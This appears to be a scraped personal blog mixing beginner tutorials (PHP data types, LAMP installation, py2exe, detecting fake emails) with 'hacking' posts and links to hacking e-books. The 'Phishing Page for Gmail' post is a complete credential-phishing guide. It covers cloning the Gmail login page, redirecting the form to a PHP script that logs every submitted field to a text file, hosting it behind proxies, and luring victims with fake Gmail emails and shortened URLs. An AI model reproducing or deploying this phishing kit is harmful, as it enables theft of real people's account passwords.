This blog is written only for EDUCATIONAL PURPOSE whatever you do isn't my responsibility its yours I only give Information here. Do everything at your own risk :)
Showing posts with label programming. Show all posts
Showing posts with label programming. Show all posts
Friday, 3 July 2015
Tuesday, 2 June 2015
Software to Create (.exe) from Python Script
Software To Create Windows Executable (exe) from Python Script:
This a simple software created by me To Create .exe from from a .py file in the most simplest way The below Video will explain how to use the software. Just Download the py2exe.zip from below link
(Note: You must have Python installed along with py2exe library)
Video:
Monday, 1 June 2015
How to Create a Windows Executable (.exe) File of a Python Script
Hello everyone in this video Tutorial I will show you how to create windows executable of a Python Script using py2exe.
Video:
Video:
Sunday, 31 May 2015
How to Install py2exe for Python 3.4
How to Install py2exe in windows 7 :
In this tutorial we will see how to install py2exe in Python 3.4
To install py2exe for Python 3.4 in windows 7 all you need is a command prompt because all the required modules and librarys are included in Python 3.4, which means we just have to use some commands to install py2exe
Steps to Install py2exe:
1. Open command prompt
2. cd to Scripts directory of Python 3.4
cd C:\Python34\Scripts
3. When you are on the directory Scripts you only have to use one more command
pip install py2exe
The above command will install py2exe
Video :
Sunday, 19 October 2014
PHP Basics #5 : PHP Data Types
PHP : Data Types
In this tutorial I will tell you about Data Types in PHP.
PHP : Data Types
There are mainly 7 types of data in PHP but we will cover only 5 types of data now and later on we will talk about the rest 2.
So the 5 data types which we are going to talk about now are the following..
- String
- Integers
- Float Numbers
- Boolean
- NULL
i. String
A string in php and all other programming or web developing languages are the alpha-numeric letters and sentences. In php we always have to write strings between single or double quotes.
<?php
echo "Hello I am a String";
echo "<br />";
echo 'Hello I am also a string between single quotes';
?>
echo "Hello I am a String";
echo "<br />";
echo 'Hello I am also a string between single quotes';
?>
The echo "<br />"; line in the code is an html tag for next line and this also shows us that we can also echo html tags if we want but for now dont use any other html tag except <br />.
If you output the above code in a browser the result will be this..
Hello I am a String
Hello I am also a string between single quotes
Hello I am also a string between single quotes
That was all about String you must know till now..
ii. Integers (Numbers)
Integers in php and every other computer language represents all numbers. Integers in php does not require quotes around it.
<?php
echo 1;
echo '<br />';
echo 10000;
echo '<br />';
echo 99;
?>
echo 1;
echo '<br />';
echo 10000;
echo '<br />';
echo 99;
?>
The output of the above codes in a browser will result..
1
1000
99
1000
99
iii. Float Numbers
Floats are the numbers like the decimal numbers and thats all I can say about it you will understand better in the example below..
<?php
echo 1.09;
echo '<br />';
echo 0.89;
echo '<br />';
echo 40.6;
?>
echo 1.09;
echo '<br />';
echo 0.89;
echo '<br />';
echo 40.6;
?>
If you open the above code in a browser the result will be the following..
1.09
0.89
40.6
0.89
40.6
iv. Boolean
Boolean is simply 'true' and 'false'. Boolean is mostly used in conditional coding and you will understand it when we start conditional coding in php. For now all you need to know is that boolean is either TRUE or FALSE.
<?php
//Thats how you declare them
$a = true;
$b = false;
?>
//Thats how you declare them
$a = true;
$b = false;
?>
v. NULL
The special NULL value represents that a variable has no value. NULL is the only possible value of data type NULL.
The NULL value identifies whether a variable is empty or not. Also useful to differentiate between the empty string and null values of databases.
Variables can be emptied by setting the value to NULL
<?php
$a = 'Hello World!';
$a = null;
echo $a;
?>
$a = 'Hello World!';
$a = null;
echo $a;
?>
The output of the above code will give you a blank page because $a was 'Hello World!', but after that you again declared $a to NULL so $a has no value
PHP Basics #4 : Variables
PHP Variables
A variable can have a short name (like x and y) or a more descriptive name (age, carname, total_volume).
Rules for PHP variables:
- A variable starts with the $ sign, followed by the name of the variable
- A variable name must start with a letter or the underscore character
- A variable name cannot start with a number
- A variable name can only contain alpha-numeric characters and underscores (A-z, 0-9, and _ )
- Variable names are case sensitive ($y and $Y are two different variables)
PHP Variables demonstration :
<?php
$a = "John";
$b = 'Terry';
$x = 1;
$y = 5;
$z = $x + $y ;
$float = 10.5;
echo $a;
echo '<br />';
echo $z;
echo '<br />';
echo $float;
?>
$a = "John";
$b = 'Terry';
$x = 1;
$y = 5;
$z = $x + $y ;
$float = 10.5;
echo $a;
echo '<br />';
echo $z;
echo '<br />';
echo $float;
?>
The output of the above will be:
John
6
10.5
6
10.5
Variables concept is quite easy to understand and If you have any conclusion in it please comment
Tuesday, 14 October 2014
PHP Basics #1 : Introduction to PHP
Introduction To PHP
What is PHP ?
PHP (recursive acronym for PHP: Hypertext Preprocessor) is a widely-used open source general-purpose scripting language that is especially suited for web development and can be embedded into HTML
What can PHP do ?
PHP is most commonly used as a Server-Side Scripting Language but it is not only bounded to it. PHP can also be used to write small desktop programs it is not that popular to creating desktop apps but still you can create small application which can help you in small tasks.
Why use PHP ?
1.) Works Great with HTML - If you already have a website and are familiar with HTML, making the step to PHP is easy. If fact, PHP and HTML are interchangeable within the page! While PHP might add some new features to your site, its basic appearance is still all created with HTML
2.) Interactive Features - PHP allows you to interact with your visitors in ways HTML alone can't. This can mean simple things like e-mail forms, or more elaborate things like shopping carts that save your past orders and recommend similar products. It can also mean social things like interactive forums and private messaging systems
3.) Easy to Learn - PHP is a lot easier to get started with than you might think. By learning just a few simple functions, you are able to do a lot of things with your website. And once you know the basics, there are a wealth of scripts available on the internet that you only need to tweak a little to fit your needs.
On the next post we will discuss about the Basic Syntax and how to write PHP codes on a html file..
What is PHP ?
PHP (recursive acronym for PHP: Hypertext Preprocessor) is a widely-used open source general-purpose scripting language that is especially suited for web development and can be embedded into HTML
What can PHP do ?
PHP is most commonly used as a Server-Side Scripting Language but it is not only bounded to it. PHP can also be used to write small desktop programs it is not that popular to creating desktop apps but still you can create small application which can help you in small tasks.
Why use PHP ?
1.) Works Great with HTML - If you already have a website and are familiar with HTML, making the step to PHP is easy. If fact, PHP and HTML are interchangeable within the page! While PHP might add some new features to your site, its basic appearance is still all created with HTML
2.) Interactive Features - PHP allows you to interact with your visitors in ways HTML alone can't. This can mean simple things like e-mail forms, or more elaborate things like shopping carts that save your past orders and recommend similar products. It can also mean social things like interactive forums and private messaging systems
3.) Easy to Learn - PHP is a lot easier to get started with than you might think. By learning just a few simple functions, you are able to do a lot of things with your website. And once you know the basics, there are a wealth of scripts available on the internet that you only need to tweak a little to fit your needs.
On the next post we will discuss about the Basic Syntax and how to write PHP codes on a html file..
PHP Basics #2 : How to Install Apache, PHP and MySQL
How to get started with PHP...?
Hello everyone in this tutorial I will show you how to make a development environment for PHP. This is one of the topics where most of the beginners have problems when to get to PHP development. You must get one thing clear that we cannot just open a editor and create a new html file and write php codes on it...this technique is not going to work with PHP as you need a localhost or a server PC to run php files and the file you are going to write PHP codes should be a .php file and don't worry this will not effect any of your html codes..
The above paragraph gives you alot of information but now lets get all topics clear.
To Start Developing in PHP :-
- PHP will not work if we write php codes in an HTML file and open in the browser.
- The file in which we will write php codes must be a PHP file ex. index.php and you dont need to worry about the HTML file getting corrupt or anything you HTML is gonna run fine in a php file.
- We need a server to run php files.
Installation Guide For Ubuntu:
About LAMP
LAMP stack is a group of open source software used to get web servers up and running. The acronym stands for Linux, Apache, MySQL, and PHP. Since the virtual private server is already running Ubuntu, the linux part is taken care of. Here is how to install the rest.Step One—Install Apache
Apache is a free open source software which runs over 50% of the world’s web servers.
To install apache, open terminal and type in these commands:
sudo apt-get install apache2
That’s it. To check if Apache is installed, direct your browser to your server’s IP address (eg. http://12.34.56.789). The page should display the words “It works!" like this.
How to Find your Server’s IP address
You can run the following command to reveal your server’s IP address.
ifconfig eth0 | grep inet | awk '{ print $2 }'
Step Two—Install MySQL
MySQL is a powerful database management system used for organizing and retrieving data
To install MySQL, open terminal and type in these commands:
sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql
During the installation, MySQL will ask you to set a root password. If you miss the chance to set the password while the program is installing, it is very easy to set the password later from within the MySQL shell.
Once you have installed MySQL, we should activate it with this command:
sudo mysql_install_db
Finish up by running the MySQL set up script:
sudo /usr/bin/mysql_secure_installation
The prompt will ask you for your current root password.
Type it in.Enter current password for root (enter for none):
OK, successfully used password, moving on...
Then the prompt will ask you if you want to change the root password. Go ahead and give it a password for mysql
Once you're done with that you can finish up by installing PHP.
Step Three—Install PHP
PHP is an open source web scripting language that is widely use to build dynamic webpages.
To install PHP, open terminal and type in this command.
sudo apt-get install php5 libapache2-mod-php5 php5-mcrypt
After you answer yes to the prompt twice, PHP will install itself.
Congratulations! You now have LAMP stack on your computer!!
Test Your New Personal Server:
Now when you can open your browser and type on the url localhost/ and press enter. If the link opens an webpage saying Apache2 Ubuntu Default Page it means you have successfully Installed Apache Server on your machine ...!
Important Note: The localhost folder is located it /var/www/html/ now can can create a new folder test inside /var/www/html/ and then create a new file inside the test folder and name it index.php open that file with any text editor or your html editor and type the following :
<?php
echo "Hello World!!";
?>
Now goto browser and open localhost/test/index.php and see the result..!echo "Hello World!!";
?>
(Dont worry I will explain the codes in next tutorial. If you encounter any problem please COMMENT.)
Sunday, 13 July 2014
New E-Books
Get these e-books for Free !! From Below Links !!
http://www.ithelper.host56.com/hack.html
http://www.ithelper.host56.com/prog.html
Monday, 2 June 2014
Create Android App For Free !!
How To Create Android Apps for Free Without Coding
Android is the most used mobile platform in the world because of its User-Friendly interface. Many of them choose Android as it is available for free and is an open source operating system. There are a lot of applications which are Inbuilt apps and also has huge number of developers all over the world.
One can easily customize the operating system without having knowledge in writing the code to create an android application. There are a lot of websites available on internet to create android apps without any coding knowledge.
It might sound daunting, but writing your own apps for an Android phone is actually easy. In the following walk through, we show you how to create your own Android app.
It might sound daunting, but writing your own apps for an Android phone is actually easy. In the following walk through, we show you how to create your own Android app.
Here I list out some websites which offer free android app creation. Try these online services to built your own android applications for free and make money instantly.
Click here to Read http://burptech.com/?p=15
Click here to Read http://burptech.com/?p=15
Make MeDroid :
Make MeDroid is one of the best app developing site. NO technical knowledge is required. Ready-to-use screens are available, mouse-click customization, and powerful actions are its special features which are very easy to develop in few minutes.AppsGeyser :
AppsGeyser provides so many types of applications for free. You can create any application which are listed on their website. They have different types of categories like website, browser, EBook, Zip archive, News, Wallpaper etc. There is no need of code to do this application.Appypie :
Appypie is another great website to create free android apps without having any programming language. It also offer a wide range of application categories. You can create android application easily from this website by using simple drag and drop feature.Tuesday, 22 April 2014
Learn Programming Or Web Developing Languages (Beginners)
Hello Everyone
In This Post I Will Tell You About My Favorite Websites To Learn Programming Or Web Developing Languages
In This Post I Will Tell You About My Favorite Websites To Learn Programming Or Web Developing Languages
1.Codecademy : (codecademy.com)
Codecademy Is One Of The Best Website For Beginners To Learn Programming or Web Developing Language. It Has an Amazing User Friendly System To Learn...
You need to Create an Account To Start Learning and It Provides Following Languages
i.HTML & CSS
ii.JavaScript
iii.JQuery
iv.Python
v.Ruby
vi.PHP
2.LearnStreet : (learnstreet.com)
LearnStreet is Similar To Codecademy but The Only Thing or Advantage we Can Say is That It Provides Video To Help along With Text Guide Like Codecademy..
It Provides Following Languages
i.JavaScript
ii.Ruby
ii.Python
3.TheNewBoston : (thenewboston.org)
TheNewBoston is for those Who Likes Only Video Tutorials To Learn It Provides a Big Range Of Languages http://thenewboston.org/tutorials.php Click On The Link To Go To The Tutorial Page Of The Site.
I Hope My Post Helped You .....
If You are Still Confused You Can Watch The Video To Decide Which Site To Start With..
Friday, 8 November 2013
Detect Fake E-Mails
How to Detect Fake Emails
Few days back one of my readers asked me about the way to detect a fake mail. I thought that this can become a good point for writing an article. So, I am mentioning some tips to detect fake/fraud/spam mails.
How to Detect Fake Mails:
1. Lets get back to the example I illustrated in my article Fake Mailer. No doubt, this was fake and the receiver will get the fake email sent by me.
2. Suppose you are the receiver. Now, I will tell you how to recognize this mail as fake. Open the email and hit on "Show Details".
3. Something you must know:
Whenever Google sends you any email, the email details will contain fields like:
- Mailed by
- Signed by (optional)
Also, most of the times, "Mailed by" field will have value:
*.bounces.google.com or
*.google.com
depending on the type of your mail. This is true for every genuine email from every mail provider.
4. But, these two fields will not be present in the details of Fake Mail. Also, if the mail details contain these fields, the value of these fields will not be *.google.com
Fake Mail without "Mailed by" field:
Fake Mail with "Mailed by" field.
As you can see, the "mailed by" field shows the hosting server's name and not the Google server. This means, this server is used to send you the fake email and most probably, the fake mailer is hosted on the same server.
You can also check out the header field to detect fake mails. Follow the steps:
- Open the mail. Hit on down arrow next to "Reply" and click on "Show Original".
- Now, check out "Received" fields. This field will show you the name of server from which the mail is sent. As you can see, we have used "emkei.cz" as our fake mailer. So, it has appeared in "Received" field.
More Tips:
- Fake Mail usually have attractive titles.
- Such mails address receiver as "Dear Customer" or such and do not use your real name.
- Never click on any link in emails. Instead, open such links manually in new tab.
Few days back one of my readers asked me about the way to detect a fake mail. I thought that this can become a good point for writing an article. So, I am mentioning some tips to detect fake/fraud/spam mails.
How to Detect Fake Mails:
1. Lets get back to the example I illustrated in my article Fake Mailer. No doubt, this was fake and the receiver will get the fake email sent by me.
2. Suppose you are the receiver. Now, I will tell you how to recognize this mail as fake. Open the email and hit on "Show Details".
3. Something you must know:
Whenever Google sends you any email, the email details will contain fields like:
- Mailed by
- Signed by (optional)
Also, most of the times, "Mailed by" field will have value:
*.bounces.google.com or
*.google.com
depending on the type of your mail. This is true for every genuine email from every mail provider.
4. But, these two fields will not be present in the details of Fake Mail. Also, if the mail details contain these fields, the value of these fields will not be *.google.com
Fake Mail without "Mailed by" field:
Fake Mail with "Mailed by" field.
As you can see, the "mailed by" field shows the hosting server's name and not the Google server. This means, this server is used to send you the fake email and most probably, the fake mailer is hosted on the same server.
You can also check out the header field to detect fake mails. Follow the steps:
- Open the mail. Hit on down arrow next to "Reply" and click on "Show Original".
- Now, check out "Received" fields. This field will show you the name of server from which the mail is sent. As you can see, we have used "emkei.cz" as our fake mailer. So, it has appeared in "Received" field.
More Tips:
- Fake Mail usually have attractive titles.
- Such mails address receiver as "Dear Customer" or such and do not use your real name.
- Never click on any link in emails. Instead, open such links manually in new tab.
Tuesday, 5 November 2013
Control Your PC From your Cell Phone
Have you ever been away from your desktop and needed some information that was on it? Have you ever needed to shutdown your computer or do something underhanded while away? In this post I am going to show you how to control your PC from your Cell Phone.
There is a program called CellPC that allows you to perform operations on your home/work PC via your cell phone or wireless device quickly and easily. Imagine being able to shutdown, restart, or logoff your PC remotely... search files on your computer and then send them to your cell phone... view a realtime screenshot of your computer at anytime... lockdown your computer... send a message/note/reminder to your computer... and much more!
CellPC Top Features:
How does CellPC Work?
Will CellPC Work for Me?
CellPC can work with any Windows computer as long as it has a steady internet connection while the software is running.
If you want to verify that CellPC will work with your device, contact the CellPC support team so you can send them a test message from your phone.
There is a program called CellPC that allows you to perform operations on your home/work PC via your cell phone or wireless device quickly and easily. Imagine being able to shutdown, restart, or logoff your PC remotely... search files on your computer and then send them to your cell phone... view a realtime screenshot of your computer at anytime... lockdown your computer... send a message/note/reminder to your computer... and much more!
CellPC Top Features:
- Perform Shutdowns, Restarts, Logoffs
- View a Screenshot of your Computer
- Search for and Retrieve Files
- View and Close Open Windows
- Customizable Commands Editing
- Be Alerted when your Computer is Used View and Close Open Applications
- Send Messages to your Computer
- Lock and Unlock your Computer
- Secure Command Execution
- Log all Access Attempts and Commands
- Disable/Enable Commands at will
How does CellPC Work?

Will CellPC Work for Me?
CellPC can work with any Windows computer as long as it has a steady internet connection while the software is running.
If you want to verify that CellPC will work with your device, contact the CellPC support team so you can send them a test message from your phone.
Some Hacking Tools
Every Beginner In Hacking Requires some Hacking Tools Some To Hack and Some to understand Today I will provide you some of the Hacking Tools :)
Download
Labels:
beginner,
email hacking,
facebook.python,
hacking,
important,
linux,
password,
phishing,
phone hacking.,
programming,
sql,
sql injection,
tools,
ubuntu,
web developing,
web hacking,
webs,
windows
Monday, 4 November 2013
Phishing Page for Gmail
How to create fake or Phishing web page for gmail

This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.
Steps for Creating Phishing or Fake web Page:Step 1:Go to the gmail.com. Save the Page as "complet HTML" file
Step 2:Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"
Step3: Upload those image to tinypic or photobucker.com. copy the url of each image.
Step4:Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .
Step 5:
Search for the
action="https://www.google.com/accounts/ServiceLoginAuth"
Replace it with
action="http://yoursite urlhere/login.php" save the file.
Step6: Now you need to create login.php
so you need to open the notepad and type as
<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save it
Step 7:open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.Note: that web hosting service must has php feature.Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. use this sites through the secure connection sites(so that you can hide your ip address) like: http://flyproxy.com . find best secure connection site.
Step 8: create an email with gmail keyword. like : gmailburger@gmail.com
Step 9: Send to victim similar to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.
Note:For user to believe change Your phishing web page url with any of free short url sites. Like : co.nr, co.cc,cz.cc This will make users to believe that it is correct url.
Monday, 21 October 2013
5 Best Pen-Test Linux Distributions
5 Best Pen-Test Linux Distributions
Linux distributions are often customized to perform many specialized tasks cater to a particular industry, hobby or business. Security Penetration testing is one such niche where professional (and hobbyists) use customized Linux distributions with the whole purpose of doing security tests on networks and personal computer (hopefully with permission). Most of these distribution are live CDs which can be used without having to install them to your computer. Today we will take a look at some of best Pen-test distributions out there.
1) BackTrack:(Now Known as Kali) Kali/ Backtrack is the most widely known pen-test distribution out there. The latest release (4 Beta) has been ported to Debian/Ubuntu from Slackware and now can be installed locally as a full distribution and tools can be updated using Backtrack repositories. Backtrack includes more than 300+ security tools.
2) Knoppix STD: As the name suggests this distribution is based on Knoppix and STD stands forSecurity Tools Distribution. This distribution didn’t get any update (like most pen-test distros) in a long time and might not work on some new hardwares but they have a fairly good collection of tools.
xfcefluxbox is used for desktop environment.
3) nUbuntu: Based on Ubuntu and fluxbox, nUbuntu is a fairly new and active pen-test distribution. They have partnered with an Italian IT security company for future nUbuntu certification and training.
4) Network Security Toolkit: NST is a Fedora based Live distribution and unlike some other pen-test distro NST can be used under virtual machine without any network configuration problems (from my experience). NST also have a unique Web User Interface to access tools and manage configurations.
5) PEENTO: A Gentoo based pen-test live cd (you could have guessed) that actually looks very nice. They are using Enlightenment for DE and has quite a few unique pen-test tools including GPU based cracking software pyrit.
There used to be a time when there were a lot of active pen-test projects out there, but eventually most of them died off from lack of updates. Notably Auditor, WHAX ( later merged in to backtrack), PHLAK to name a few. Which pen-test live cd do you use or tried before?
Friday, 18 October 2013
Some Useful E-Books
List of Ankit fadia's Hacking EBooks
1 . Ankit Fadia Hacker's Guide
2 . Untold Windows Tips and Secrets(Ankit Fadia)
3 . Base64 Encoding Torn Apart
4 . Batch File Programing - Ankit Fadia
5 . Closing Open Holes
6 . Defacing Websites A step Process By Ankit fadia
7 . Dos Attacked
8 . Ankit Fadia - Encryption Algorithms Explained
9 . Firewalls - How to unblock it??
10 . FTP Exploits By Ankit Fadia.pdf
11 . Gathering info on Remote Host
12 . Hacking into Linux
13 . More Password Cracking Decrypted
14 . Removing Banners from your sites
15 . Sendmail and Beyond
16.SSL Torn Apart
17.Tracing IP,DNS,WHOIS-nslLookUp
18.Transparent Proxies in Squid
19.Transparent_proxies_with_Squid_By-Ankit Fadia
20.Truths!!!--What They Don't teach in
Manuals!!!.pdf
Link : http://adf.ly/XlaQ9
1 . Ankit Fadia Hacker's Guide
2 . Untold Windows Tips and Secrets(Ankit Fadia)
3 . Base64 Encoding Torn Apart
4 . Batch File Programing - Ankit Fadia
5 . Closing Open Holes
6 . Defacing Websites A step Process By Ankit fadia
7 . Dos Attacked
8 . Ankit Fadia - Encryption Algorithms Explained
9 . Firewalls - How to unblock it??
10 . FTP Exploits By Ankit Fadia.pdf
11 . Gathering info on Remote Host
12 . Hacking into Linux
13 . More Password Cracking Decrypted
14 . Removing Banners from your sites
15 . Sendmail and Beyond
16.SSL Torn Apart
17.Tracing IP,DNS,WHOIS-nslLookUp
18.Transparent Proxies in Squid
19.Transparent_proxies_with_Squid_By-Ankit Fadia
20.Truths!!!--What They Don't teach in
Manuals!!!.pdf
Link : http://adf.ly/XlaQ9
Labels:
ebooks,
email hacking,
facebook,
hacking,
important,
kali linux,
linux,
password,
phishing,
phone hacking.,
programming,
proxies,
sql,
sql injection,
tools,
ubuntu,
web developing,
web hacking,
webs,
windows
Thursday, 17 October 2013
Best E-Books For Newbie and Amateur Hackers ;)
One of the international best-selling. The book walks through how to use the more powerful and popular hacker software, including L0phtCrack. This new edition has been updated extensively, largely with the results of "honeypot" exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There's a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols. Hacking Exposed wastes no time in explaining how to implement the countermeasures--where they exist--that will render known attacks ineffective.
link : http://p.pw/e14
------------------------------------------------------------------------------------------------------------
Internet Denial of Service sheds light on a complex and fascinating form of computer attack that impacts the confidentiality, integrity, and availability of millions of computers worldwide. It tells the network administrator, corporate CTO, incident responder, and student how DDoS attacks are prepared and executed, how to think about DDoS, and how to arrange computer and network defenses. It also provides a suite of actions that can be taken before, during, and after an attack. Inside, you'll find comprehensive information on the each and every topic relating denial-of-service attacks.
link: http://p.pw/5WZ
------------------------------------------------------------------------------------------------------------
It offers real, practical solutions to help ordinary users keep viruses out of their e-mail in-boxes-and explains how to respond when one slips through-
* In 2003, there was a major virus attack almost every month, which cost businesses worldwide an estimated $55 billion and did untold damage to home computers.
* Explains what viruses are and how they work, profiles major anti-virus software packages, shows how to keep anti-virus software updated, and helps people adopt safer computer work habits.
* The book\92s value price and compact size will make it irresistible to people who need to protect their home PC or network.
link : http://p.pw/v7R
---------------------------------------------------------------------------------------------------------------------------------
-: Hackin9 :-
This book will help you learn :-
* How to use Google to find sources of personal information and other confidential data.
* How to find information about vulnerable systems and Web services.
* How to locate publicly available network devices using Google.
link : http://p.pw/Hhj
--------------------------------------------------End------------------------------------------------------------------
-Admin (Zakir)
Subscribe to:
Posts (Atom)




